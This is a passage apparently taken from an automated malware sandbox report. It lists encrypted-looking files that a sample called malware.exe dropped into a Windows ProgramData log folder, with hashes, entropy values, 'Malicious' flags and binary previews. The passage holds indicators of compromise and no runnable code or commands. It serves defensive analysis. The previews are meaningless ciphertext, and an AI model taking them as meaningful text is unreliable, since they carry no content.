                        Entropy (8bit):7.9945726190171635
                        Encrypted:true
                        SSDEEP:768:qdWMawvss74DZ0wxeedzPVNSgh3zdjbzwEN1Pt+O:a12Je0zNkazhfPt+O
                        MD5:4CD88C4774A12C8A70243B936A595922
                        SHA1:3BCE932A0C4076F19184406C74010114651CE8FD
                        SHA-256:FBCEB5DEFBBA02B4F011BA3030BE752576DF0E5547896491FFAF30E659F5D56E
                        SHA-512:4ED6F663CD1B56B4813A9443928A2B3D8E770E4125894C7E5D9592DFA23119271949852BC91AFD3EC2FE5233F48A6C8BBB7F0BDC6326BCE14183003307CDD8FD
                        Malicious:true
                        Preview:.J.r......*.$..Tj&.....I...m.M.?..a>R.......6Dn.<'yJe..B.h.[...E....eD.?-T50...V6.qG.b2.z.*.z...GM3(...^&..^.. .C?>q..=&.:..a.H@..=....F..{w..^j..L'...nc.!.....6.\.}..|H.l... k..n.Vy...C...T...k.#..-......2T.cn...{...5y.....~...)...n..K=.qZX..!@~.E..I..-.u2gI..Q.....9.(.....T.5 ..*.X...-....v6"Fn..`.{.LF..{.0~.Ku..{.!..E}..V.....9R.L}.{...5...F6..B1z....q.^.#m.:.`..H*.0.@..m.<.Z.|*Y...PK.m...).vuw..f...CM.+._?q..'.}.9....771..d..S..X..9.zF..7./..D..G.....pM4.^.7..M........;.|......l.]'..$.........\...B.n9=\jF.c.. ...H.........{....t..#!.(.v{.........0&..*.lU....,.......AU.ymtk..b.>.W.Y.....\9.'..4..8J..F3/sz....M..|;%}..X......v!.V^...-....\.-.%/.../e...h;..B..C..I..B...Z.......*R,.[}...{......tF......C....&...m..tk.5VD.EF.. ...Q...7..4.Cq...x..q..N....sK....H&..UF...J..4u._.-.L&..2........j.y......<.ye..V....N.).l.n8>.<9z.L..6.......'O.....9?.OU-...B}...q...w..U...WQ..........h6Lv..N:.-...B..4..V.i...".$Cz.M.D./L...g.{...'.G8...D..m..kV.<

                        C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.12f4b0a3-2493-41b5-84db-21e2bcb53ca6.1.etl

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:PGP Secret Sub-key -
                        Category:dropped
                        Size (bytes):49260
                        Entropy (8bit):7.995869068945433
                        Encrypted:true
                        SSDEEP:1536:JMsDzmMm7YcgZXRpeiaqH3m8CVpM/1Tkow:JLLm2xGrc3m8CfM/1c
                        MD5:B701E0F0D5F09821979D399E567FB07F
                        SHA1:061D6B222A0337DBD73D3DBE4E25737FA8651DEF
                        SHA-256:C1D94DD80E44D2E16554326B10C0CA3EB3FDCE4A8B20CD543A39E6555CE0C812
                        SHA-512:3CEA283639DF8EE13F036D275EDA49A6C009E280D6DF1BA6544D3F7ED9A746A4F054DA14114D734C5FC6A142B1082C187A66C0A3308BFB3440C77D70A99B06F8
                        Malicious:true
                        Preview:...y..(....*....;...I......_..-..Y..8.u.Qb.8N.!.f8......I...a7....6......>.........h_...sf1.5...:..}..v...D.S[....@O.I.}....;.P..Z.M.SV...u..@..W..YTM...d.?e.]:...j..$%..Kj7u~.k..WX.............-q.`.L.....mZ.I.....=..H...o.....B.d.o...3t...%x.>..~..U.|.....+.I.K)...?.o.j-.z..........8T.@..&...M......$.Fg.....uX...%'."..)!...i#.u./z..h...aY.j.B.d..4..>.......=.M.$..Wt./T..kZ}....BP."x.p"....N..?..;..J/.....&0.q.G.8.4..............e.^..A3.%k_.Q...V....+...F.>...E.5j.i.".|._..<.W..9Y.u..8..g&....Nx.^.......K.=.u.H...].......|2j.........p........G.~.+8..^........c........l..;\e.>.....y.].Q.....K>.......x....Zo.q.T.`..M..AP/.c.(.(d./..3...!P..|.... [..%....w.2oU.....g.@..]..Bx..-..)P%U).\.0,0KJ=.m...e..wzX4:.G(...>z..*....`Y.rz_..Z.(..x..br...9-.......r~.B..g...}.........<.5.0.Md.Ls4R...q@.:..W...p.c.......hUN.......,|X.T5.=.Q#v.. .D....M.....?.7.-.F.k/...s.@.fL.UPwv.i.`.\D..Z...^...*..|..J.E[&x:VH].5Q.`.pJ.. ..V.=.r{bl{.m.<..w.i..{P..QFEpeC~.....

                        C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.27bed3f1-68c9-49d1-a722-3ebce1687afe.1.etl

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):49260
                        Entropy (8bit):7.9960845708153085
                        Encrypted:true
                        SSDEEP:768:hPKiwKIdX0tttK6LjOKeDWKgAgeoxaQLHkBeWKmK3iDWWVWdxMUjcBumaAkeg:dfqdX0EAjA15oMQLkkW8iDB48UIobn
                        MD5:3519EC72557C8A10C3A5D993DA9A5C15
                        SHA1:822802CDD6FBE7216688D3E712FE73552823FFB4
                        SHA-256:165A0C8F411217D817E08D106189FBE4E5CBAB771AD8DB1B5C26E6D3305AAFB3
                        SHA-512:662F30E24EB00858B3AB6A8BAAD228448BD31FEAD1EA32FFF23716AAE797FAEE04C371FC6BB8E13D479EFD98DB2A0BF228FFBF91D393FEE82146199986340AF2
                        Malicious:true
                        Preview:%)..;..%..1.v.......2*.S...V.[.;.+S`$sJ4..j_....n:....m..o..T....h.+...|y..Oq.....]<(.3r..{....0....+,B1.a.O.../.DK~4F..X.....g.Z4C&W...........".4.zXj..v.Gf.|. ...ET...X.u.Y...,.h8.1.4'.>..69.u:D]....a .....z`./ZC...P.~......5......kP..ep.e..O....%{| <....sc1......=...9S..........0.I.].....}.>..*[.s^....V.+....LkS?..........3CR..D>+..6.....,.._.....]=7.AT.!.<......?.y.>.t.C.\.bC..0.tq.z.<..,...T-........e.D.....Q...%|....M.YD.KF..^z.......n-....U..>..;c;.,..v...G*#4..V......0.(x.....c.g...~.....>..i.o.a.."..N&.....?..2....*....x.v.:].aj..d..2..v.]Zp}..L.6m.u...#......[....f..L..&Q..S`..mv.....J)}c;........h.g....y0...@'.-.]..O.BP....UI..3...4.......Vt..n...?..#...R...{..+^....q.{.a......\...-.~......v.....yK.....Nb>A.q..j.J....k=.U...d...9Qwv...Ru.(6.v.P..x.Z..M..k.@b.eGa..B`...e...m...o...$.%I.........@..%..![P.....iQ..>...H.F.Ez"T2..7.....o.$..G..[.....O.~0.T.U..c....C.h..V..h.`.$!..X1.....i6.I.....Q;.."~.V.My.....or..aA.......QL.

                        C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.3252bd92-212a-43b9-b716-30271b7db485.1.etl

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):77932
                        Entropy (8bit):7.9977961198638585
                        Encrypted:true
                        SSDEEP:1536:Qc7c9WifWFLOhJVoD1k7bJDZZ9dbTEIMPZN52h0:Qc7JSWFkugjbdbTQPL526
                        MD5:FB07E21BE0355474DB1862DA332D0C07
                        SHA1:3C9542537FC032F3F3C3CB64E92C3A3398E114F6
                        SHA-256:93AFB84A5668906561EDD35B64C28B4BC0761CAB46CCB9667D52C0BD69AB2D28
                        SHA-512:C3D03BE298992621516521DD290E4BD354A0A0D0C8DAE51950D0744EF3AC4B9C24661D6B88AB73F13DB2BEC72A506C4645581D85335F7F93FDEF2E8F96084E1D
                        Malicious:true
                        Preview:........|.|.\..&'.J.r......-.d......if.W.......-...t|...Cl.......?...vEK.2T......#..........ha.....N6lW......+...C.H.0'y....Pk.!........^...%..\.:.b.....Z.';..Sa.',.......T.d"p.&.H...dK&.R..q....V{.E.Q...z..Y....%~.h6;.I......U.c.u^......T@.3s.cYm....././c.f..?.?.8..E.+Og..T....u.<.._.U....d@_7..q*k:.t"...`.....rO...9.khG|......l..:.(z.7.a$=...P..\..-U.Jta|..n..nCQ.,9...$8.@..B.B..%)..nq.Q*...2V...Gjm...[X...a\c.d.......Ud8.1....(.....a....#.....^.....2.e;*#.U.....1..P..v./Z.\..q.7".i.... ..s'..(1.......m..]...\.z....[R.A..../Jo...S.wy.f.f.....'a}.\.od..P..5@f...;......^.].....i..ON....?c..Y]........:.}.-..QQ..|A.u_..8.;7I..r.H...8...~.C..Q..p...3..G...VGe....Y...E.~.[=.E.4..#dr......X....w`..`.k....6......h...._...?.W..@.kH.A=>..L.U.`....|=e,K.....Vs....!..n.H..6l.zw.B.j;.....T.).E@....uqi.9.....?.kq%BA..s.u...Z...`)0..T%In?~....%....oa..y......A...!...!-.3.......Ps.b.......Yp:UT.....~.-.O...F..7..B4...Q.w>.<=+j.....;...W...

                        C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.3252bd92-212a-43b9-b716-30271b7db485.2.etl

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):12396
                        Entropy (8bit):7.984621652490321
                        Encrypted:false
                        SSDEEP:192:QZMsB6YPKbHqJ5C9pUxBZVo2Lo4b4jZn7xXef2A6vVvkjsbkBdqexcHnYlmv/3LO:QZMRxL21ZVZL5kZQufNkLbqHgm33C
                        MD5:71539E22AD0B6363E180F85E8A12CA2B
                        SHA1:EBB88E1D5E7E027C452D5C78C4262C07B563F53C
                        SHA-256:8369B931E8DB1DD5EB2BA549E19BD1CACE95DE957F5E6B2B6A7D732CE45AC237
                        SHA-512:ACED000D5196EBB66BFDE90E9042CF4532A8CDED1FA6AC1DB1EAF5E8CE2F72839F304758ED901395BCA554D0B4690F0F8DEF15DAE4AF7AD21D685C1747C02AA2
                        Malicious:false
                        Preview:..TA}...B*.......Y.....|......`;....W..........}|.k.....o.|..Y.<..'...'a...v|..)KN.......w.B.....Y1)Q}.8....[@x-I...+...O...z.)2Q...N...l..J.....D...r. ..o.........].4oW...2......X..8.].9..2........\,~0...lc.h.{. ..>.#..h...T.Lc.z..4..=<..Hn_.. .%.I.Yf.E..\..M..?,.....s{.".....t.....y...mZ......?).......m.I........I..`.HM.....sz...# .....R.(.%....L..Qj...r.d..+...l..nYH.-Z;:..W.R.'.,s...X).-.....s.....f.b(HWEz..l<..}.].....=....*.Z....].R....?ww..j..:W...a.2::........i.C..{.x)..e.......V.<..y..G...(.*N....C.z+...(q...A....Ag..w....4..?}.)r.a*.\@..u..:.wz.d,.k..........odx.(....0.Ye...n...v.".I ..ITH.a.l..Y...0r.e.o.*f f..v....0D.>.@4..$..d., 8QXC.C.e.....x'..p....5.>.s.....S...45`...1..+.../u..`.....".0..W...}.q..0.O......M..t!...V jds.../....E......O.VID....eHVy.m.O...os.2...$>..m...Uz.&...6..Y.....h._h.....Z......UI...A.jzK......;.#>..=E.V.zt......].5..{..g.Um.6t..1f..).T..|...e.R..-.$j..P/...7.d.Y.Z.%.Y..i..M"..O...d....XawC.I..$...O3!e......=

                        C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.456c314c-694c-46de-be66-a081d0cb7df7.1.etl

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):53356
                        Entropy (8bit):7.996436703094552
                        Encrypted:true
                        SSDEEP:1536:jyL9IAZhAv2jWwnAN2TpaJrZs6e/bGyyH7yCx:j6IA2wA0GWyHBx
                        MD5:99A993E09810EF1F6B4CB02988D9DC41
                        SHA1:4E077824D2455D9FD5B16F3306E3D2CE7049657F
                        SHA-256:B70B002269D43291B3C325F858DFD0E6789BA90414907D85A775910C08DFFD11
                        SHA-512:7BAB531439CF5976BAE554F7F1160649A2ADC61B4570387683E31246AD61E72070BB0BB2CB7C904D1AC0A36D54C55F2387B24936B244C52EE5DD974941C3ECF8
                        Malicious:true
                        Preview:.#7....>...D.A.r. ..-......(.*.....$..g..u.z.A,..........SQ......!8...1....:..lz.~..d....b.....P.#.u....$..a.!/..m..k...0U.............o1.bt..u....|.>.kI.H..dA ;..e,.A.}X..d..E..2j.pb.c.~+...ZE..'.3.PU`...S.........8....j...S...!.;.l..7....?.$[.~...CU..g...Lt-EI.)0..{..H.t..X....@.l..A..#.../_2....DtQ.;W.;Hja...{..*...(T.Z.....UC$...3..=.X.......'...*...q |....i.J]..d5..6...<.;.{...8.h.n|Y..9.$y;x~.. f.-^'.&~..e.t......ID.3....)'.x.=3{.....8..~.V.|.......I..>...#...O.zx._i..J..S..g<.......mQ...j..7.~t?....V....O..)......).'......\y...V0........;..{....^".J....r.z.u.2.+.guUe... R...{<.q.r+...s.[..5.v,?N.@...$6.7...N..r..4...]}.Y.fy!.....f..tG..q...t.m....._.....L7.i.E[v...=.+zM...4.6T...N...j..C..R..Sc),/p.a.....m...$B....\.g,.....-....P.|.X......e[....+.7Q..NI2..N..A|....R.l.UJ}T..q..;5..3...=:...k...K.y*...V3.......eP..S..c.....E.Oq!.p)..U~.T...$.w..^....J>`..xZ..p......m.....U....6.....R@..0.J...e\.L...hf.......Xbq..(G5w...yH....i..]

                        C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.58d76bcd-62a1-46af-b234-21d45b4c8ddb.1.etl

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):49260
                        Entropy (8bit):7.9962609115814445
                        Encrypted:true
                        SSDEEP:768:aBrpoEQ5IWYGVHEAeoXoesgJf6PzRTtuFeSG1/OdKC6CkKQR2ouEwxosNRi7Hdnt:aBrpRnWJHdeKVsIkukSfkuoRwPH+9Ag
                        MD5:69B09C816CDA3D23AEC7E79E160C40AF
                        SHA1:3CCD6ABF117F028611E69D72B2ADB427982CFDEC
                        SHA-256:4213F92449373A100E3EF8BED0A4426A8BAD5953647C6CA97E31F8DEB790C403
                        SHA-512:7FC12E1D704C6DA2C2C1850840E79E368D296C6F672BE003B5E7B4C1B76D8885431403CAF0F1C14AFD2C171A35B4846671949EDAECE7BB5291E00CF141FFD6FF
                        Malicious:true
                        Preview:4.C...,.}..q.C.*...=...V..f.e...S.v..P$M?.+.<..:...mS...1...+.B...qr...h.G+.D...C.2.uN_...ZO.1:....-$.:...C.|.!...D..%j.a....J..N/B.Q/^..W..A.Z}...@.u.Y..s..X6^]...d......$n}.."# 0..n#\`..1S..5.i.[Q..(.5 .`/[<..\^.~..R.....q....D...].!...3.........n...i.Cuzy."G......>.{.jT.).aQ.P..e<!...':......=..z...s..e...^q..P.Z.....X.Q2....4.H...f7.E.4...{/.b..../..>umFu..B...d....5.~.a..*......9...K.._?.#..k4...@.7.%J....c..Ed.k.&N...|.....$#.T`v..(...i...d..VM.....i%.m.gs1.....m.=P..u..`.*a.....Ol.O.8....q.Jp...M.@!^.mi.....h..^...X;........#.....p<x.D...H..HhX.iF.^ZU....P..Na.(c..E.hC..J.....*"..x.i.V./...v.W0...:...x.d..>Q.......k.p./M..........g..4o.K.|7.+.....\.............N.9......#..js}.Xk...R.Y*.tn....BA.Ey.X......H0...|.lC......s.e.C.+.5k.v.? ...L.d..t.....z.-M..5.~s.#9NX.l.?...y........Z...a...g]o~/........i.-3.....7.....o.nL.e.E..m...>-..=gQ;...r."....z...?....K.w....f..E>..../m.Q.@.Q...+D...y.M...Y.D..,.{......gMI8.Q.cG..k..~7Ht...

                        C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.599b8733-4301-4cc3-93ed-74bd979f66dd.1.etl

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):77932
                        Entropy (8bit):7.997690911933844
                        Encrypted:true
                        SSDEEP:1536:k/73nAT2z5m4Akz7ycdgQHnY+BjGvIbvPc7OiyuaHswJGeL:kD36kzmcp1jGkPervEswJzL
                        MD5:6FC8E7D700C2536B3C7BD040E64B82E2
                        SHA1:9C376F7A818BD089D2191B4049644B8D2F3250EB
                        SHA-256:C483B6DF49DB1AD6020D9C9BBE173F75F48DCE928CD0B79507562C0D88030974
                        SHA-512:1CCAACFD965BCF6949B99D16009D84BB7E534B682E6860C45DC6D0E6D75670C84F026ED0CBC99C57E983AD4150B24B9C18D64B8AB1942343D35041C36F8445D2
                        Malicious:true
                        Preview:.m......Z..IkZa9..a..3.&".j..s.f....gI..C.w..K.U7.b.;s...PK.Vv".yi.z.{...%.7.3Z.5....T..b....~u/.........K..E.5I..M!.%.w. ..#...7x[F......X#....(n..NC.uu..A^...."...1*..1H............H..s.`.*. LQ....}...KC.....-..f...f.......l.~~...\..F.....f.m.......i..W...H*.....z.1../...M...3.....Q*.......j....vP..).....!....,.6-.pE.?....j......'i.-y...I...<+.H.^^S...b#..h....c.*..);.Y.?.D.z..bO7-..)......./..(X..).^FN.i.w"8.E..0g.0'.E...'....@S..W.....SwL...w2.%.?q...ywu.dX...,.t.a..mH^m.KW......vR.WLB=M.IE..;1........wI....RI._.R.>.......|d;.=........j..z."..%b..+...>.;........z..H|X.V.H...F..ic....H.....i.1.|....8D.c...._.d..J.....T......x.|.;H.:.....@}.c..\.r.W....MKK`..+..XL.{@..>......a...[ ..sn8.~.8z..'<...S..Q.......^..~:|Q.S.s.G..,K..g.......}.:...l.._...~....4....x..|.*.S.s.%0.4...p.......X....k.R..r.r.....-Vv~p.b...6....s...h.OY.......8Y1...>.y&.A.....<.5.e.....*@.j.-DG._.........S.~.....6...a.<K......5....R...H..$HSo.........D:?....EG+.hU?..

                        C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.599b8733-4301-4cc3-93ed-74bd979f66dd.2.etl

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):77932
                        Entropy (8bit):7.997634396103748
                        Encrypted:true
                        SSDEEP:1536:SlNUNN8UcHycAAVrIw0WyYMTNZJB2EJv1K3WSHkqD+1iu:SGcHychVrIwjS2c1K3WCkqC
                        MD5:59277BC7C7E77C1BD4FC8C1A813FEC65
                        SHA1:859ADCB4F47A7DCBB53067B08A634B9A3647E86E
                        SHA-256:545BD7EAD94BF6D915058A8E2A4E7C3DB6E59EEEBAFC3762363D94DD071C79CE
                        SHA-512:979CBBAD6350A883AEF51C0333DB12898A91CCCD3028173ADC894477F4FDB1292E6D06188C5372347E57C4422730042237057894AE1BFD41A0DFEBEB41A1BFFE
                        Malicious:true
                        Preview:.9..z..d.3..3.K......rw...}..Y.j.......<...u{....>.O...@...<......}..,C.H.....s......u..Ud....g2!...."2.y1...t.LB_..o.>.9.......P+P...<|.vI...X...}. G....p.a..vWU.n....$.\......i...'..r.3...-..j....;|....B.Mi.1..QS{. ...{.&....n.7.,3,...L...tIY. .^..[....Z....:._.. ......j.|_..>.+..B.!.....C..&..W.I..5.J"..PA.&@.+...>...y.qm.D.[1Y...pS..dR..r..)......~.2.rv....$...i...$....1A...../.~z.>.".]e...D.Q(..F..0%..._.K#u{iJ..~7.O....IY.C....y.xS.e.7)..Pft.h[.T4..R.x6.q..D......I..{&..De......@..T..}5.2..!..#-N.>!i....L5..f..(sT....r...*..tB.h......cJ.....'.5!..i..`...Q.^.']w.R-A@go;&!.....Y.d.rNv...G.)B...e..M%#B6#..]..!..G.6rb.....&Wj2.U.-.R...X(.b.)...L.Z.4Y...h....f..A<.)...9....f..^..G.(..._..:c$$...........g....d.q...$^....b.....!.m<..:.....b.'.0.S.A.......k[l.<.,A$..06..g..Yh.).....].G......L[.*.P.(..t..P\....QR..V.P.==Jn..!C...H.t..W.4..6~..4I[.....h....d.>.<.k^...9.p.^0...nK<...+^...M....:_p7......czK..:|9....)q..X 3...@.#.8...kLU{..>5.l

                        C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.599b8733-4301-4cc3-93ed-74bd979f66dd.3.etl

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):77932
                        Entropy (8bit):7.9976189862526414
                        Encrypted:true
                        SSDEEP:1536:bKD1jJgkJR/Ea9zam5fhvDoQhGaHD3zYNLmwaUF3GulktJwe9rPonY6eRfEuk:bGHSLAvUQMaHrzYtxNCtJhRz6eRu
                        MD5:F46C9BDD612138EC1D3C873C71225802
                        SHA1:E90FAF13C93D7B8EEA8BB9D194270FADAA757FA3
                        SHA-256:919B4F685AAB94966B0C11A98AC930EDD4FD1A5E12F9261D31EC40D7ED0CB248
                        SHA-512:4840C87ED0B20182DAE14241FD1A9D55E0D82CD5BE59ECC21EC3B2EACC5A4BE65C703F7B4857B72F389538058384E16465AB3B9D4DCEC02A6D058912E78EF6F9
                        Malicious:true
                        Preview:.6.Et$.b.B.;..ts_.4....t..Gt...&.c%....VSL.I.Q..8.p.W=~.......B../.....X&...]Vn..0.:..]..[U.Q.t.. .EV....$.:.^...\.yvu.|S..n+..+-j.5K..F.z..u<..v....5........$.hc.$!......1].$..w.T0...G4._.).1.....;H..i.k..2......*....x.,. .}..40.J(7........G......R.....r..n....../@l(]...[.o..@i.8....>+yC...X.C.ul.....Y..."{.......yo.>.+.;.-....=.C...BX.Np.L.......Xq@.q.y..L:......U..oY+.,gZU.........ku".F.X.a...6M|:....k.CV..pJ1?..X..'........_..$'.c...qZ.g.V..$U./;.*Y..).7g..L....'.|.T.......}l.@.A:...$.<.[..gQy.EQ..N.W..~.H /.o.....9...L..A.....U......g..!.........y<.0..J..O..2.b..X.)...U.a......+a.....'...6....j...H9..s.2<0....r..J...@V. 3Y..I.}.e...p.....k.<Z..I.~.....$G~H4.^T...x...)#Y..obq...Hota.~..6......0.od."-.....A..K.i.FQ?..(yr.+1...5....u@..._R".av.7{+....AS.T...x.kn.'.........].BM....N...~.bM.>W.....t.e..".e.F.b....d......'.?...@;..#.%..M......._N.Zy:O......7.."..[*.)..N.[.0.yt.....nY>a..S.Y.xH..c..'l.PuZ.p...]L.^...Qb.,.}.AU...}.d.^../I.

                        C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.599b8733-4301-4cc3-93ed-74bd979f66dd.4.etl

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):77932
                        Entropy (8bit):7.997762333027004
                        Encrypted:true
                        SSDEEP:1536:tdNSl9sMX+yjo4hGFDs/WZt3WeDqdyTJ3yGn2jaTJeDATLIMCjGHhuKz9ruXfX/:tdN4sMXu4hUDgDeIylCW2jueDEgFKzUX
                        MD5:7FC038B73611EE2EEBC401612BFFC2C4
                        SHA1:E583D36BF3257C05DE7D92B3995E1953B7AF5E2C
                        SHA-256:16925F4048081E09C71065D3EA4EF94A37A71736E55C226B4FEAED2C8E21F865
                        SHA-512:D7B4D76FF489D0D86306C4F5BB5AC411BF1930056E16F4C48406E0905178479584846C11DBE2A8B08548DA7BFAA1B154133AFFFB306D0038168271C359AF0B87
                        Malicious:true
                        Preview:.f..dpj.n....j_...y.....n..._...(....O..m+....+.P....H...K$VD...j..H....n..{.Dl&`Y.....4.S.... ......).v.....3_.3.s6...;\o#...y..D..i)Y....c-K.2xS.......D.Q.b..!.. ..m........@H.w.8.....F.....8.....v.....r.i..P...o.O..4c$..H.6..%V..0R.=.`.d..T..[-H...d'F...N.K..L..0....T.|.../.k].....Lp......EU..xVK....C.......!.......[....{.....G_~[.h.....'9.......V.O.DD......S.w..;.D..y..l........&z.T....2..6...7oK.....Q.!p./..6%uQ...f.x.p..A.J..rA....q.Op9..9.L}..7..s{.Kh...<i..........e.N....h.....o..N...A........t....L...(9.......P...-m...$d[`M.....5}....gf.Q.i..U.5.[...+.%.S...F.F..#.!e.ls$...=&!.I....eS.Z....j.J.rn.r..<..u._eEE{..q.e....B..<.v.Y...bR......P.6H?.G.".P7;a...K~G.?~^..)....z.Z.?.J...D^.f..'.Mt9.hQ,.....+..c.c8.6....{....4...(y].>.5!..l5.V..".5...N...;..o.L..".wp*K.h..Y..U.u..<..-..}@n.....a..0h...26.wr...B..C.......,.'u.....D|..LU1A`A...^.q<............YA..)nR..Y....}.?....#.5.g'.........LxY..".%.....h.^..{.'6.-...3t.)g.Y%....

                        C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.599b8733-4301-4cc3-93ed-74bd979f66dd.5.etl

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):32876
                        Entropy (8bit):7.994472160474349
                        Encrypted:true
                        SSDEEP:768:+VOSAtaOy44G0lu35+sshzCC4HCvZQCVWolbhreTcUa/Nt5B:GlAtr4G0lysACmCzYolbhrXD/N9
                        MD5:5108E161DEC83EF841B88018660D8D4D
                        SHA1:F880AF55D1F3C1CBFC257C6DD84E57D22C4E3023
                        SHA-256:3FAF332D2E63B8FCA8CDAD5CC1E7B35BCC0CC6187A8D7624D9F47DFDAC1A8D12
                        SHA-512:D75B7DB0A50E3C1DB1243AC00C51895FDE15947AF8AFE0FE153DBB385035005488AD79B77D43E4DB3C7284D9532A6970B9A6B12080AFEAF23440E05C17CA621C
                        Malicious:true
                        Preview:P.......l....5l,.....o...tyH..R.R .5...B........s.....P....f.4..qC=...:...@.._.......T...F.TK....[..w..n`.\....Crv..bZ.Zj..Z.......#5..,..s...S...jm..5-l....o.1...U..B0....Qd..TO.1.W.dEg.D.v...)..OC...]@#f...nI....b.ue.;...s"...!!.2i..k.uIpP..@...,.n...D~......l>$.w...`d....uU..]..M2...}..DM..;.?.mC.....L..r..-.&..A.$+U..A....g.H../...*.....V......Z...(mT=].lI......R......>.R.wQ....pDP..-..#...;..@n..0.`.>}.....U...*0L.=...0....6.O.)wu.0BXy&n.k..?c.....U....o ...JL.x....{....b..0m...Y.9"-....G.j..}FR..so..w...H.d.\].+....;.p..S;9?.eF'.[|g.Yx.>..../..B...A...i...!_.b.....-,._\..,1T..... ~}..r.....r..s....h.^.....xB.....V..o#.......t?|..."eW.......+.Y......Bm.....Z....@...z7Hm....\_.&...F.&..J....,.....g...q......\..Y..\B.V....9....Y'.r.(rtw.}..t..)...M........x- .JV.K..BXo.M......m..v.)...fd._.[.l......v.8..%h..J.v.a.A(....-....N..[...;J.......C....\...O..,..8.........J....F../...w...)...I.....?[.j...D~.J....eg.X.aRM...A(.....

                        C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.5cf9101f-dc6a-47c8-a434-4cad9d63cff0.1.etl

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):77932
                        Entropy (8bit):7.9974882416671
                        Encrypted:true
                        SSDEEP:1536:6SPnQ/YkC8BWR6AlY6zMFZFUrqWUmY3as75sABN8AC9KoYowKA1:6Sv2nCs3kYUywqWUmEft3N8HQoaKM
                        MD5:0F95DDCBCA3E060A81C5A400855E342E
                        SHA1:18F1AFE64B1A27B063742E60FAD4A508FA933383
                        SHA-256:B0AA14B6CD8624607F8BEF66BE6E5D14950DDACD2A675A80E3D3C326B11BD2C8
                        SHA-512:245FB1CF75A5307A5CD57DE1B03317F4575EDA7F71B93730088BAA47D4847DCB102D011DD05F398443C14A5F1B966DFE1DCBC868B2A184ACA6BA95E398BCFCFC
                        Malicious:true
                        Preview:.........4.l....;.@\.."(..p..O-5h)%....+}.. f...s.u;..v(...$aY..d.X.......w...8...ni..%A".G.'C...m..7~.GW`.`.v.K..D.r..M.......-.@.~J'...)Vw.6|........OU..!#..U....g4........G...-Q.Kwbc4.-.........2....U.y*...^p.rp.Gk.s.X..I..Y..M.,.&.V..6r.T........W..d."...$u.t..A.{[.b..l1.o..h>G.z.`)5.f.........Q.......4Q.J....0..[.,.....t.l%b|.=...r.S/.......{:./...:.ZOq..L...5.E.../.....E......6...G...\.^..Y.....~...L.....J..*..>Q....M......yp.w{.u.Ta.F79.u.7Q.H.;.|....{3&.......5l...J....../O..,.OK...`.u-...A.4+.g.J..].9p..80...d.o.W.X.....D?...=.....V..E.....o:....a..V...f..E.0< .W.....w)i.R'.t#.!..8M.FE.6m.mUZ..\N1..7y.n.X................Z.u.(.a...%>\}...^...u...&..@..@&nl.E2..b..Q6o...R.-w}.....|2j.`T..~..D..!.V.2...tU..I......".#Kh...4...E^....D.._.'X.cp....l..&=...pu..U'b..P...Q._....m..RA.o.A...?y.k..n....E.&....?....1.@1.@......w $J....bT..:..w.Y...dyH..........X[N.Aa....VW.......B..O#.!...f8F...._y..}.....R.kOc.5..u.=..\..[.....

                        C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.5cf9101f-dc6a-47c8-a434-4cad9d63cff0.2.etl

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):77932
                        Entropy (8bit):7.99779939112788
                        Encrypted:true
                        SSDEEP:1536:5Jc7Sggb248MOsAzsDBXh0Wb/iSq7mLb7zhCcgBiZp2k7tOxb:HgslGsXBiS8mDtCcjy+o
                        MD5:4243C59E2F24CD34AD8E43569875C32B
                        SHA1:8BA49F6EB8FE3D3B66687E077D10F98E738F3166
                        SHA-256:73A729E6E748133623F2BBDE62B5324AC552AEDEC2FDD70745A5C04DCEC6A758
                        SHA-512:B99B1397170347B1808D0F7DD31A019987109A18E1BDB0449002A949630B620C5613E87177E025D28364C674C7BFB2201078C7341731D6B32C2D109D8ED32085
                        Malicious:true
